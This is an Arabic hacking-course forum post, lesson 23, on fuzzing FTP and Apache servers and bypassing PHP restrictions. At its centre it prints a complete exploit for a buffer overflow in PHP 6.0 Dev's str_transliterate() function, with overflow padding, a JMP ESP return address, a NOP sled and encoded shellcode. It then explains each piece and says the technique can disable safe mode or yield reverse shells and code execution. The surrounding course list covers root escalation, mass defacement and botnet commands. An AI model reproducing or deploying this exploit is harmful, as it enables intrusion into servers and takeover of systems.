ايجي الوطن العربي
مرحبا بك فى منتديات ايجى الوطن العربي منتديات الحصريا لكل عام
اذا كنت من الاعضاء يرجى تسجيل الدخول
واذا كنت من الزوار يرجى التقدم بتسجيلك فى المنتدى لمعرفة المزيد يرجى التواصل مع ادارة المنتدى
* يرجى ملئ البيانات بطريقة صحيحة *
-- تحت رعاية --
المجك
ايجي الوطن العربي
مرحبا بك فى منتديات ايجى الوطن العربي منتديات الحصريا لكل عام
اذا كنت من الاعضاء يرجى تسجيل الدخول
واذا كنت من الزوار يرجى التقدم بتسجيلك فى المنتدى لمعرفة المزيد يرجى التواصل مع ادارة المنتدى
* يرجى ملئ البيانات بطريقة صحيحة *
-- تحت رعاية --
المجك
ايجي الوطن العربي
هل تريد التفاعل مع هذه المساهمة؟ كل ما عليك هو إنشاء حساب جديد ببضع خطوات أو تسجيل الدخول للمتابعة.

ايجي الوطن العربي

كل ما تتوقعه تجده عندنا
 
الرئيسيةأحدث الصورالتسجيلدخول

ايجي الوطن العربي  :: المنتدى :: دورة اختراق المواقع والسيرفرات
 

 [الشرح الثالث و العشرين] شرح ال fuzzing على ftp server + apache + PHP bypass

اذهب الى الأسفل 
كاتب الموضوعرسالة
Admin
Admin



المساهمات : 149
تاريخ التسجيل : 15/07/2013

[الشرح الثالث و العشرين] شرح ال fuzzing على ftp server + apache + PHP bypass Empty
مُساهمةموضوع: [الشرح الثالث و العشرين] شرح ال fuzzing على ftp server + apache + PHP bypass   [الشرح الثالث و العشرين] شرح ال fuzzing على ftp server + apache + PHP bypass Icon_minitimeالثلاثاء يوليو 23, 2013 8:07 am

السلام عليكم و رحمة الله و بركاته ,,



اليوم شرحنا عن كيفية اختبار البرامج المختلفة مثل

Ftp server

و

apache server

و

كشف ثغرات ال php.e xe

و التى منها نستطيع السيطرة على النظام او تخطى الوضع الامن و تشغيل الدوال الممنوعه و المحظور استخدامها على السيرفر

طيب تلميح بسيط بالنسبة لاخر نقطة الى هى php

احنا هانختبر دوال ال php الموجودة فى اصدار الاباتشى الى عندك من ثغرات الفيض

و لو فى دالة مصابة بثغرات فيض يمكن استخدامها لتنفيذ امر معين و منها نغلق السيف مود

او تتبع ال EIP الخاص بالعملية و اعادة توجية مسار معالج الاباتشى

الى عمل اتصال عكسى او code execute

مثلا ثغرة دالة

كود PHP:
str_transliterate()
مصابة بفيض فى اصدار PHP 6.0 Dev

كود PHP:
if(ini_get_bool('unicode.semantics')) {
$buff = str_repeat("\u4141", 256);
$eip = "\u1445\u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll
$nops = str_repeat("\u9090", 20);

# WinExec Calc XP SP3 HEB Unicode-encoded shellcode
$shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u250D\u7C86\uD3FF\u6163\u636C\u414E";
 
# WinExec Calc XP SP3 EN Unicode-encoded shellcode (added by muts)
# $shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u23AD\u7C86\uD3FF\u6163\u636C\u414E";
 
$exploit = $buff.$eip.$nops.$shellcode;
str_transliterate(0, $exploit, 0);
} else {
exit("Error! 'unicode.semantics' has be on!\r\n");
}


يمكن عمل التالى :

هنا نولد الفيض

كود PHP:
$buff = str_repeat("\u4141", 256);
و هنا عنوان ال EIP الجديد الذى سيسلكه البرنامج

كود PHP:
$eip = "\u1445\u10A9"; # 0x10A91445 JMP ESP @ php6ts.dll
و هنا عملية فارغة NULL

كود PHP:
$nops = str_repeat("\u9090", 20);
يعنى البرنامج لا يطبق شىء فيها No operation

و الشيل كود

كود PHP:
$shellcode = "\u02EB\u05EB\uF9E8\uFFFF\u33FF\u5BC0\u4388\u8315\u11C3\uBB53\u250D\u7C86\uD3FF\u6163\u636C\u414E";
يمكن عملة بالميتاسبلويت و يتم تنفيذ الشل كود .

طيب الان نتابع عملية فحص البرامج و البى اتش بى

يمكنك المتابعه من هنا

كود PHP:
http://www.mediafire.com/download/gigtvej6bgjgk77/Fuzzing_FTP_Server_Apache_PH.rar
و البرامج المستخدمة فى الشرح مرفقة

و اى استفسار برجاء وضعه بموضوع الاستفسارات

والله الموفق و المستعان ..




الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://emadtoemadto.yoo7.com
 
[الشرح الثالث و العشرين] شرح ال fuzzing على ftp server + apache + PHP bypass
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» [الشرح الحادى عشر] POST Sql injection & Authentication bypass
»  [الشرح العشرين] استخدام الهندسة الاجتماعية فى اختراق المواقع و السيرفرات
» [الشرح الثانى و العشرين] بعد الروت .. استطلاع الداتاسنتر و اختراق سيرفرات اخرى
» [الشرح الحادى و العشرين] الحصول على صلاحيات الروت بطرق مختلفة و عمل Mass Deface
» [الشرح الثالث عشر] اوامر بوت نت zeus

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
ايجي الوطن العربي  :: المنتدى :: دورة اختراق المواقع والسيرفرات-
انتقل الى: